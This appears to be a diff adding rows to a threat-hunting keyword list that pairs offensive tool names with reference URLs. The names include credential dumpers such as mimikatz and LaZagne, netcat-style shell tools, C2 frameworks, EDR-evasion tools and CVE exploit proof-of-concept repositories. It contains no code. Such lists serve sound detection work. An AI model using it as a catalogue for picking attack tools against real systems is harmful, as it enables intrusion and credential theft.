+"https-portal","https://github.com/SteveLTN/https-portal" +"Huan","https://github.com/frkngksl/Huan" +"Hub 
VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hunter.io","https://hunter.io/" +"hyperion","https://www.kali.org/tools/hyperion/" +"Hypnos","https://github.com/CaptainNox/Hypnos" +"hypobrychium","https://github.com/foxlox/hypobrychium" +"I2P","https://geti2p.net/" +"icalcs","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin" +"icalcs","https://github.com/ice-wzl/wmiexec2" +"icebreaker","https://github.com/DanMcInerney/icebreaker" +"icmpsh","https://github.com/r00t-3xp10it/venom" +"icmpsh","https://github.com/bdamele/icmpsh" +"ICMP-TransferTools","https://github.com/icyguider/ICMP-TransferTools" +"icmptunnel","https://github.com/s-h-3-l-l/katoolin3" +"IDiagnosticProfileUAC","https://github.com/Wh04m1001/IDiagnosticProfileUAC" +"ifconfig","N/A" +"ifconfig","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"IIS-Raid","https://github.com/0x09AL/IIS-Raid" +"IKEForce","https://github.com/SpiderLabs/ikeforce" +"impacket","https://github.com/oldboy21/LDAP-Password-Hunter" +"impacket","https://github.com/SecureAuthCorp/impacket" +"impacket","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py" +"impacket","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" +"impacket","https://github.com/dirkjanm/krbrelayx" +"impacket","https://github.com/fortra/impacket" +"impersonate-rs","https://github.com/zblurx/impersonate-rs" +"Imperva_gzip_WAF_Bypass","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass" +"ImplantSSP","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP" +"inceptor","https://github.com/klezVirus/inceptor" +"Indirect-Syscalls","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls" +"infernal-twin","https://github.com/entropy1337/infernal-twin" +"Infoga","https://github.com/m4ll0k/Infoga" 
+"iNinja VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"injectify","https://github.com/samdenty/injectify" +"InjectProc","https://github.com/secrary/InjectProc" +"InsecurePowerShell","https://github.com/cobbr/InsecurePowerShell" +"InspectAssembly","https://github.com/matterpreter/OffensiveCSharp/tree/master/InspectAssembly" +"interactsh","https://github.com/projectdiscovery/interactsh" +"Intercepter-NG","https://github.com/intercepter-ng" +"Internal-Monologue","https://github.com/eladshamir/Internal-Monologue" +"IntruderPayloads","https://github.com/1N3/IntruderPayloads" +"Inveigh","https://github.com/Kevin-Robertson/Inveigh" +"InvisibilityCloak","https://github.com/h4wkst3r/InvisibilityCloak" +"Invisi-Shell","https://github.com/OmerYa/Invisi-Shell" +"Invoke-ACLpwn","https://github.com/fox-it/Invoke-ACLPwn" +"Invoke-AzureEnum","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1" +"Invoke-AzurePasswordSpray","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1" +"Invoke-BSOD","https://github.com/peewpw/Invoke-BSOD" +"Invoke-BuildAnonymousSMBServer","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer" +"Invoke-DOSfuscation","https://github.com/danielbohannon/Revoke-Obfuscation" +"Invoke-DOSfuscation","https://github.com/danielbohannon/Invoke-DOSfuscation" +"Invoke-Obfuscation","https://github.com/danielbohannon/Invoke-Obfuscation" +"Invoke-Phant0m","https://github.com/hlldz/Invoke-Phant0m" +"invoke-piper","https://github.com/p3nt4/Invoke-Piper" +"Invoke-PowerThIEf","https://github.com/nettitude/Invoke-PowerThIEf" +"Invoke-PrintDemon","https://github.com/BC-SECURITY/Invoke-PrintDemon" +"Invoke-ProcessScan","https://github.com/vysecurity/Invoke-ProcessScan" +"Invoke-PSImage","https://github.com/peewpw/Invoke-PSImage" 
+"Invoke-SMBRemoting","https://github.com/Leo4j/Invoke-SMBRemoting" +"Invoke-SocksProxy","https://github.com/p3nt4/Invoke-SocksProxy" +"Invoke-TheHash","https://github.com/Kevin-Robertson/Invoke-TheHash" +"Invoke-TmpDavFS","https://github.com/p3nt4/Invoke-TmpDavFS" +"Invoke-WCMDump","https://github.com/peewpw/Invoke-WCMDump" +"Invoke-ZeroLogon","https://github.com/BC-SECURITY/Invoke-ZeroLogon" +"iodine","https://linux.die.net/man/8/iodine" +"ip","N/A" +"IP Unblock","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"ip-api.com","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"IPBurger Proxy & VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"ipscan","https://github.com/angryip/ipscan" +"iptables","https://attack.mitre.org/techniques/T1562/001/" +"ipv4.myip.wtf","https://github.com/3ct0s/disctopia-c2/blob/main/libraries/disctopia.py" +"ItWasAllADream","https://github.com/byt3bl33d3r/ItWasAllADream" +"ivy","https://github.com/optiv/Ivy" +"jackdaw","https://github.com/skelsec/jackdaw" +"jackit","https://github.com/insecurityofthings/jackit" +"Jatayu","https://github.com/SpiderMate/Jatayu" +"java-deserialization-exploits","https://github.com/Coalfire-Research/java-deserialization-exploits" +"javascript-obfuscator","https://github.com/javascript-obfuscator/javascript-obfuscator" +"Jira-Lens","https://powersploit.readthedocs.io/en/stable/Recon/README/" +"Jira-Lens","https://github.com/MayankPandey01/Jira-Lens" +"john","https://github.com/openwall/john/" +"JohnTheRipper","https://github.com/magnumripper/JohnTheRipper" +"joomscan","https://github.com/rezasp/joomscan" +"Jormungandr","https://github.com/Idov31/Jormungandr" +"JuicyPotatoNG","https://github.com/antonioCoco/JuicyPotatoNG" 
+"JunctionFolder","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder" +"JustEvadeBro","https://github.com/sinfulz/JustEvadeBro" +"jwt_tool","https://github.com/ticarpi/jwt_tool" +"kali","https://www.kali.org/" +"kali-anonsurf","https://github.com/Und3rf10w/kali-anonsurf" +"kalitorify","https://github.com/brainfucksec/kalitorify" +"katoolin3","https://github.com/s-h-3-l-l/katoolin3" +"keepass-password-dumper","https://github.com/vdohney/keepass-password-dumper" +"Keethief","https://github.com/GhostPack/KeeThief" +"KeeThiefSyscalls","https://github.com/Metro-Holografix/KeeThiefSyscalls" +"kekeo","https://github.com/gentilkiwi/kekeo" +"kerberoast","https://github.com/xan7r/kerberoast" +"kerberoast","https://github.com/nidem/kerberoast" +"kerbrute","https://github.com/ropnop/kerbrute" +"keylogger keyword","N/A" +"KeyTabExtract","https://github.com/sosdave/KeyTabExtract" +"KillDefenderBOF","https://github.com/Cerbersec/KillDefenderBOF" +"kismet","https://github.com/kismetwireless/kismet" +"KittyStager","https://github.com/Enelg52/KittyStager" +"koadic","https://github.com/zerosum0x0/koadic" +"koadic","https://github.com/offsecginger/koadic" +"krackattacks-scripts","https://github.com/vanhoefm/krackattacks-scripts" +"KrakenMask","https://github.com/RtlDallas/KrakenMask" +"krbjack","https://github.com/almandin/krbjack" +"KrbRelay","https://github.com/cube0x0/KrbRelay" +"krbrelayx","https://github.com/dirkjanm/krbrelayx" +"KRBUACBypass","https://github.com/wh0amitz/KRBUACBypass" +"kubesploit","https://github.com/cyberark/kubesploit" +"kwetza","https://github.com/sensepost/kwetza" +"L0phtCrack","http://www.l0phtcrack.com/" +"LALIN","https://github.com/screetsec/LALIN" +"LANs.py","https://github.com/DanMcInerney/LANs.py" +"LAPSDecrypt","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4" +"LAPSDumper","https://github.com/n00py/LAPSDumper" +"LAPSToolkit","https://github.com/leoloobeek/LAPSToolkit" 
+"LaZagne","https://github.com/AlessandroZ/LaZagne" +"LaZagneForensic","https://github.com/AlessandroZ/LaZagneForensic" +"LAZYPARIAH","https://github.com/octetsplicer/LAZYPARIAH" +"ldapdomaindump","https://github.com/dirkjanm/ldapdomaindump" +"ldapminer","https://sourceforge.net/projects/ldapminer/" +"ldapnomnom","https://github.com/lkarlslund/ldapnomnom" +"LdapRelayScan","https://github.com/zyn3rgy/LdapRelayScan" +"ldapsearch","https://man7.org/linux/man-pages/man1/ldapsearch.1.html" +"ldapsearch-ad","https://github.com/yaap7/ldapsearch-ad" +"LDAPWordlistHarvester","https://github.com/p0dalirius/LDAPWordlistHarvester" +"ldeep","https://github.com/franc-pentest/ldeep" +"ldifde","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"Lethean Proxy VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"LightsOut","https://github.com/icyguider/LightsOut" +"ligolo","https://github.com/sysdream/ligolo" +"LinEnum","https://github.com/rebootuser/LinEnum" +"LinkedInt","https://github.com/mdsecactivebreach/LinkedInt" +"linux","https://github.com/RoseSecurity/Red-Teaming-TTPs" +"linux-exploit-suggester","https://github.com/The-Z-Labs/linux-exploit-suggester" +"linuxprivchecker","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py" +"linux-smart-enumeration","https://github.com/diego-treitos/linux-smart-enumeration" +"linWinPwn","https://github.com/lefayjey/linWinPwn" +"litefuzz","https://github.com/sec-tools/litefuzz" +"localpotato","https://github.com/decoder-it/LocalPotato" +"locate","N/A" +"Locksmith","https://github.com/TrimarcJake/Locksmith" +"LoGiC.NET","https://github.com/AnErrupTion/LoGiC.NET" +"LogonTracer","https://github.com/JPCERTCC/LogonTracer" +"LOLBAS-Project","https://lolbas-project.github.io/" +"Lovely-Potato","https://github.com/TsukiCTF/Lovely-Potato" 
+"lsass","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" +"LsassSilentProcessExit","https://github.com/deepinstinct/LsassSilentProcessExit" +"lsassy","https://github.com/Hackndo/lsassy" +"luckystrike","https://github.com/curi0usJack/luckystrike" +"lyncsmash","https://github.com/nyxgeek/lyncsmash" +"LyncSniper","https://github.com/mdsecactivebreach/LyncSniper" +"MAAD-AF","https://github.com/vectra-ai-research/MAAD-AF" +"MaccaroniC2","https://github.com/CalfCrusher/MaccaroniC2" +"macchanger","N/A" +"macetrap","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/MaceTrap" +"macro_pack","https://github.com/sevagas/macro_pack" +"Macrome","https://github.com/michaelweber/Macrome" +"MacroMeter","https://github.com/Cn33liz/MacroMeter" +"mailpv","https://www.nirsoft.net/utils/mailpv.html" +"MailSniper","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1" +"MailSniper","https://github.com/dafthack/MailSniper" +"MaliciousMacroGenerator","https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator" +"MaliciousMacroMSBuild","https://github.com/infosecn1nja/MaliciousMacroMSBuild" +"MalSCCM","https://github.com/nettitude/MalSCCM" +"Malus VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"malware","N/A" +"malware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/" +"MANSPIDER","https://github.com/blacklanternsecurity/MANSPIDER" +"mars stealer","https://3xp0rt.com/posts/mars-stealer" +"masscan","https://github.com/robertdavidgraham/masscan" +"megatools","https://github.com/megous/megatools" +"Memcrashed-DDoS-Exploit","https://github.com/649/Memcrashed-DDoS-Exploit" +"merlin","https://github.com/Ne0nd0g/merlin" +"metagoofil","https://github.com/laramies/metagoofi" +"metame","https://github.com/a0rtega/metame" 
+"metasploit","https://www.metasploit.com/" +"metasploit","N/A" +"metasploit","https://github.com/rapid7/metasploit-framework" +"metasploit","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"metasploit-payloads","https://github.com/rapid7/metasploit-payloads" +"metatwin","https://github.com/threatexpress/metatwin" +"MeteTool","https://github.com/S-S-X/metatool" +"mhydeath","https://github.com/zer0condition/mhydeath" +"micr0_shell","https://github.com/senzee1984/micr0_shell" +"MicroBurst","https://github.com/NetSPI/MicroBurst" +"mimikatz","https://github.com/skelsec/pypykatz" +"mimikatz","https://github.com/SafeBreach-Labs/EDRaser" +"mimikatz","https://github.com/vyrus001/go-mimikatz" +"mimikatz","https://github.com/Stealthbits/poshkatz" +"mimikatz","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1" +"mimikatz","https://github.com/g4uss47/Invoke-Mimikatz" +"mimikatz","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" +"mimikatz","https://github.com/gentilkiwi/mimikatz" +"mimikatz","https://github.com/gentilkiwi/" +"mimikittenz","https://github.com/orlyjamie/mimikittenz" +"mimipenguin","https://github.com/huntergregal/mimipenguin" +"mitm6","https://github.com/fox-it/mitm6" +"mitmAP","https://github.com/xdavidhu/mitmAP" +"MITMf","https://github.com/byt3bl33d3r/MITMf" +"mitmproxy","https://github.com/mitmproxy/mitmproxy" +"mitmsocks4j","https://github.com/Akdeniz/mitmsocks4j" +"Mobile-Security-Framework","https://github.com/MobSF/Mobile-Security-Framework-MobSF" +"Mobile-Security-Framework-MobSF","https://github.com/MobSF/Mobile-Security-Framework-MobSF" +"MockDirUACBypass","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass" +"modDetective","https://github.com/itsKindred/modDetective" +"Modlishka ","https://github.com/drk1wi/Modlishka" 
+"modproble","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml" +"monkey","https://github.com/guardicore/monkey" +"morphHTA","https://github.com/vysecurity/morphHTA" +"mortar","https://github.com/0xsp-SRD/mortar" +"mousejack","https://github.com/BastilleResearch/mousejack" +"movefile64.exe","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin" +"movfuscator","https://github.com/xoreaxeaxeax/movfuscator" +"MpCmdRun","N/A" +"Mr.SIP","https://github.com/meliht/Mr.SIP" +"mRemoteNG-Decrypt","https://github.com/haseebT/mRemoteNG-Decrypt" +"MSBuildShell","https://github.com/Cn33liz/MSBuildShell" +"MSDAT","https://github.com/quentinhardy/msdat" +"msfpc","https://github.com/g0tmi1k/msfpc" +"msfvenom","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom" +"Mshikaki","https://github.com/trevorsaudi/Mshikaki" +"msi-search","https://github.com/mandiant/msi-search" +"msldapdump","https://github.com/dievus/msLDAPDump" +"MSOLSpray","https://github.com/dafthack/MSOLSpray" +"mspass","https://www.nirsoft.net/utils/mspass.html" +"mssqlproxy","https://github.com/blackarrowsec/mssqlproxy" +"MultiPotato","https://github.com/S3cur3Th1sSh1t/MultiPotato" +"Muscle VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"My Browser Vpn","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"myexternalip.com","https://myexternalip.com/raw" +"Mystikal","https://github.com/D00MFist/Mystikal" +"mythic","https://github.com/MythicAgents/freyja/" +"mythic","https://github.com/MythicAgents/merlin" +"mythic","https://github.com/MythicAgents/Athena" +"mythic","https://github.com/its-a-feature/Mythic" +"mythic","https://github.com/MythicAgents/Apollo/" 
+"nac_bypass","https://github.com/scipag/nac_bypass" +"nanodump","https://github.com/fortra/nanodump" +"nanorobeus","https://github.com/wavvs/nanorobeus" +"nbtscan","https://github.com/charlesroelli/nbtscan" +"nbtstat","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/nbtstat" +"nc","N/A" +"nc","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/NetcatCheatSheet.pdf" +"nc","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"ncat","N/A" +"ncrack","https://github.com/nmap/ncrack" +"Neo4j","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory" +"nessus","https://fr.tenable.com/products/nessus" +"net","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/" +"net","N/A" +"net","https://github.com/RoseSecurity/Red-Teaming-TTPs" +"net","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/" +"netcat","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" +"netcat","http://netcat.sourceforge.net/" +"net-creds","https://github.com/DanMcInerney/net-creds" +"NetExec","https://github.com/Pennyw0rth/NetExec" +"Net-GPPPassword","https://github.com/outflanknl/Net-GPPPassword" +"NetLoader","https://github.com/Flangvik/NetLoader" +"NetNTLMtoSilverTicket","https://github.com/NotMedic/NetNTLMtoSilverTicket" +"netpass","https://www.nirsoft.net/utils/network_password_recovery.html" +"netscan","https://www.softperfect.com/products/networkscanner/" +"netsh","N/A" +"netsh","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"netsh","https://github.com/ice-wzl/wmiexec2" +"NetshRun","https://github.com/gtworek/PSBits/blob/master/NetShRun" +"netsniff-ng","https://packages.debian.org/fr/sid/netsniff-ng" +"netstat","N/A" +"NetworkMiner","http://www.netresec.com/?page=NetworkMiner" 
+"ngrok","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"Nightmangle","https://github.com/1N73LL1G3NC3x/Nightmangle" +"nikto","https://github.com/sullo/nikto" +"NimBlackout","https://github.com/Helixo32/NimBlackout" +"nimbo-c2","https://github.com/itaymigdal/Nimbo-C2" +"nimcrypt","https://github.com/icyguider/nimcrypt" +"Nimcrypt2","https://github.com/icyguider/Nimcrypt2" +"NimExec","https://github.com/frkngksl/NimExec" +"nimplant","https://github.com/chvancooten/NimPlant" +"Ninja","https://github.com/ahmedkhlief/Ninja" +"nipe","https://github.com/htrgouvea/nipe" +"nirsoft tools","nirsoft.net" +"nirsoft tools","N/A" +"nishang","https://github.com/samratashok/nishang/tree/master/Antak-WebShell" +"nishang","https://github.com/samratashok/nishang" +"NixImports","https://github.com/dr4k0nia/NixImports" +"nltest","N/A" +"nmap","https://nmap.org/" +"nmap","https://github.com/zmap/zmap" +"nmap","https://github.com/vulnersCom/nmap-vulners" +"nmap","N/A" +"nmap","https://svn.nmap.org/nmap/scripts/" +"nmap","https://nmap.org/book/nse-usage.html" +"nmap","https://github.com/nccgroup/nmap-nse-vulnerability-scripts" +"nmap","https://github.com/Diverto/nse-log4shell" +"nmap","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts" +"nmap","https://github.com/shadawck/nse-install" +"nmap","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"nmap","https://github.com/nmap/nmap" +"NoFilter","https://github.com/deepinstinct/NoFilter" +"nopowershell","https://github.com/bitsadmin/nopowershell" +"No-powershell","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs" +"NordVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"noseyparker","https://github.com/praetorian-inc/noseyparker" +"Nosql-Exploitation-Framework","https://github.com/torque59/Nosql-Exploitation-Framework" 
+"NoSQLMap","https://github.com/codingo/NoSQLMap" +"novelbfh","https://github.com/nyxgeek/classic_hacking_tools" +"nping","https://nmap.org/nping/" +"NPPSpy","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy" +"nps_payload","https://github.com/trustedsec/nps_payload" +"ntdissector","https://github.com/synacktiv/ntdissector" +"ntdlll-unhooking-collection","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection" +"NTDLLReflection","https://github.com/TheD1rkMtr/NTDLLReflection" +"NtdllUnpatcher","https://github.com/Signal-Labs/NtdllUnpatcher" +"ntdsutil","N/A" +"ntlmquic","https://github.com/xpn/ntlmquic" +"NTLMRelay2Self","https://github.com/med0x2e/NTLMRelay2Self" +"ntlmscan","https://github.com/nyxgeek/ntlmscan" +"NTMLRecon","https://github.com/pwnfoo/NTLMRecon" +"NTMLRecon","https://github.com/puzzlepeaches/NTLMRecon" +"NtRemoteLoad","https://github.com/florylsk/NtRemoteLoad" +"NtRights","https://github.com/gtworek/PSBits/tree/master/NtRights" +"Nuages","https://github.com/p3nt4/Nuages" +"Nucleus VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"nysm","https://github.com/eeriedusk/nysm" +"o365-attack-toolkit","https://github.com/mdsecactivebreach/o365-attack-toolkit" +"o365creeper","https://github.com/LMGsec/o365creeper" +"o365enum","https://github.com/gremwell/o365enum" +"o365recon","https://github.com/nyxgeek/o365recon" +"obfy","https://github.com/fritzone/obfy" +"octopus","https://github.com/mhaskar/Octopus" +"OffensiveCSharp","https://github.com/matterpreter/OffensiveCSharp/tree/master" +"OffensiveNotion","https://github.com/mttaggart/OffensiveNotion" +"Offensive-Payloads","https://github.com/InfoSecWarrior/Offensive-Payloads/" +"Office-DDE-Payloads","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads" +"Oh365UserFinder","https://github.com/dievus/Oh365UserFinder" 
+"OMG-Credz-Plz","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz" +"OMGLogger","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger" +"omg-payloads","https://github.com/hak5/omg-payloads" +"onedrive_user_enum","https://github.com/nyxgeek/onedrive_user_enum" +"One-Lin3r","https://github.com/D4Vinci/One-Lin3r" +"onesixtyone","https://github.com/trailofbits/onesixtyone" +"onex","https://github.com/rajkumardusad/onex" +"onex","https://github.com/cube0x0/MiniDump" +"onionscan","https://onionscan.org/" +"openbullet","https://github.com/openbullet/OpenBullet2" +"openbullet","https://github.com/openbullet/openbullet" +"Openssh","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors" +"openvas","https://www.openvas.org/" +"Operative Framework","https://github.com/graniet/operative-framework" +"ophcrack","https://gitlab.com/objectifsecurite/ophcrack" +"orbitaldump","https://github.com/k4yt3x/orbitaldump" +"OSCP-Archives","https://github.com/CyDefUnicorn/OSCP-Archives" +"OSCP-Cheatsheets","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md" +"Osmedeus","https://github.com/j3ssie/osmedeus" +"OWASP","https://github.com/OWASP" +"p0f","https://www.kali.org/tools/p0f/" +"p0wnedShell","https://github.com/Cn33liz/p0wnedShell" +"p0wny-shell","https://github.com/flozz/p0wny-shell" +"P4wnP1","https://github.com/RoganDawes/P4wnP1" +"Pachine","https://github.com/ly4k/Pachine" +"PackMyPayload","https://github.com/mgeeky/PackMyPayload/" +"pacu","https://github.com/RhinoSecurityLabs/pacu" +"padre","https://github.com/glebarez/padre" +"ParamPamPam","https://github.com/Bo0oM/ParamPamPam" +"parrot os","https://www.parrotsec.org/download/" +"PassDetective","https://github.com/aydinnyunus/PassDetective" +"PassHunt","https://github.com/Dionach/PassHunt" 
+"passphrase-wordlist","https://github.com/initstring/passphrase-wordlist"
+"PassTheChallenge","https://github.com/ly4k/PassTheChallenge"
+"Passware Kit Forensic","https://www.passware.com/kit-forensic/"
+"passwd","N/A"
+"passwordfox","https://www.nirsoft.net/utils/passwordfox.html"
+"Password-Scripts","https://github.com/laconicwolf/Password-Scripts"
+"pastebin","pastebin.com"
+"patator","https://github.com/lanjelot/patator"
+"Pateensy","https://github.com/screetsec/Pateensy"
+"PayGen","https://github.com/youhacker55/PayGen"
+"Payload-Download-Cradles","https://github.com/VirtualAlllocEx/Payload-Download-Cradles"
+"PayloadsAllTheThings","https://github.com/Bo0oM/PayloadsAllTheThings"
+"Pazuzu","https://github.com/BorjaMerino/Pazuzu"
+"PcapXray","https://github.com/Srinivas11789/PcapXray"
+"Pcredz","https://github.com/lgandx/Pcredz"
+"pdbedit","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md"
+"pe_to_shellcode","https://github.com/hasherezade/pe_to_shellcode"
+"PEASS","https://github.com/carlospolop/PEASS-ng"
+"peCloak","https://github.com/v-p-b/peCloakCapstone/blob/master/peCloak.py"
+"pentestbox","https://pentestbox.org/fr/"
+"PENTESTING-BIBLE","https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE"
+"pentest-machine","https://github.com/DanMcInerney/pentest-machine"
+"PE-Obfuscator","https://github.com/TheD1rkMtr/PE-Obfuscator"
+"PerfExec","https://github.com/0xthirteen/PerfExec"
+"petipotam","https://github.com/topotam/PetitPotam"
+"Pezor","https://github.com/phra/PEzor"
+"Phant0m","https://github.com/hlldz/Phant0m"
+"PhantomService","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService"
+"phishery","https://github.com/ryhanson/phishery"
+"phishing-HTML-linter","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing"
+"phoenix miner","N/A"
+"PhoneInfoga","https://github.com/sundowndev/PhoneInfoga"
+"php","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md"
+"PhpSploit","https://github.com/nil0x42/phpsploit"
+"phuip-fpizdam","https://github.com/neex/phuip-fpizdam"
+"pingcastle","https://www.pingcastle.com/"
+"pingcastle","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle"
+"pingcastle","https://github.com/sense-of-security/ADRecon"
+"pingcastle","https://github.com/vletoux/pingcastle"
+"ping-sweep","https://github.com/libresec/ping-sweep"
+"PipeViewer ","https://github.com/cyberark/PipeViewer"
+"pivotnacci","https://github.com/blackarrowsec/pivotnacci"
+"PKINITtools","https://github.com/dirkjanm/PKINITtools"
+"pktmon","https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon"
+"POC","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit"
+"POC","https://github.com/random-robbie/cve-2022-23131-exp"
+"POC","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py"
+"POC","https://github.com/pykiller/CVE-2022-23131"
+"POC","https://github.com/qazbnm456/awesome-cve-poc"
+"POC","https://github.com/QHpix/CVE-2021-44521"
+"POC","https://github.com/Ridter/noPac"
+"POC","https://github.com/risksense/zerologon"
+"POC","https://github.com/sfewer-r7/CVE-2023-34362"
+"POC","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb"
+"POC","https://github.com/ricardojba/Invoke-noPac"
+"POC","https://github.com/ricardojba/noPac"
+"POC","https://github.com/puckiestyle/CVE-2022-0847"
+"POC","https://github.com/mtivadar/windows10_ntfs_crash_dos"
+"POC","https://github.com/nikhil1232/LibSSH-Authentication-Bypass"
+"POC","https://github.com/nowsecure/dirtycow"
+"POC","https://github.com/mrchucu1/CVE-2022-0847-Docker"
+"POC","https://github.com/Mr-xn/cve-2022-23131"
+"POC","https://github.com/Mr-xn/sunlogin_rce"
+"POC","https://github.com/positive-security/dompdf-rce"
+"POC","https://github.com/Privia-Security/ADZero"
+"POC","https://github.com/ptresearch/AttackDetection"
+"POC","https://github.com/onecloudemoji/CVE-2022-30190"
+"POC","https://github.com/peterspbr/dirty-pipe-otw"
+"POC","https://github.com/plummm/CVE-2022-27666"
+"POC","https://github.com/sherlocksecurity"
+"POC","https://github.com/yasserjanah/CVE-2020-5902"
+"POC","https://github.com/yuanLink/CVE-2022-26809"
+"POC","https://github.com/yunuscadirci/CallStranger"
+"POC","https://github.com/WiIs0n/Zerologon_CVE-2020-1472"
+"POC","https://github.com/worawit/MS17-010"
+"POC","https://github.com/xndpxs/CVE-2022-0847"
+"POC","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html"
+"POC","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"
+"POC","N/A"
+"POC","https://github.com/ZecOps/CVE-2020-0796-LPE-POC"
+"POC","https://github.com/zhzyker/CVE-2020-5902/"
+"POC","https://github.com/zwjjustdoit/cve-2022-23131"
+"POC","https://github.com/welk1n/JNDI-Injection-Exploit"
+"POC","https://github.com/sinsinology/CVE-2023-20887"
+"POC","https://github.com/smgorelik/Windows-RCE-exploits"
+"poc","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY"
+"POC","https://github.com/sherlocksecurity/VMware-CVE-2022-22954"
+"POC","https://github.com/si1ent-le/CVE-2022-0847"
+"POC","https://github.com/SimoneLazzaris/ditty"
+"POC","https://github.com/trganda/CVE-2022-23131"
+"POC","https://github.com/WazeHell/sam-the-admin/tree/main/utils"
+"POC","https://github.com/websecnl/CVE-2022-26809"
+"POC","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce"
